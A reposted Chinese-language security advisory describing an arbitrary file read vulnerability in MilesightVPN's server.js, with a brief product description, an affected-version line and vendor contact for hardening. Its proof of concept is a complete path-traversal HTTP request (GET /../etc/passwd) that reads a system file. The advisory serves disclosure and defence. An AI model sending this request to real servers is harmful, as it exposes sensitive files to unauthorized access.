安全情报|Milesight VPN server.js 任意文件读取漏洞

admin 2024年3月18日18:34:53评论16 views字数 655阅读2分11秒阅读模式

漏洞介绍

MilesightVPN 是一款软件,可使 Milesight 产品的 VPN 通道设置过程更加简便,并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件

影响范围

MilesightVPN 

漏洞情报

POC

GET /../etc/passwd HTTP/1.1Host: xxxxxxContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Content-Length: 507Connection: close

加固建议

及时联系厂商获取加固建议:https://www.milesight-iot.com/milesightvpn/

关注我们

原文始发于微信公众号(极星信安):安全情报|Milesight VPN server.js 任意文件读取漏洞【文末附HW面经】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月18日18:34:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安全情报|Milesight VPN server.js 任意文件读取漏洞http://cn-sec.com/archives/2585550.html

发表评论

匿名网友 填写信息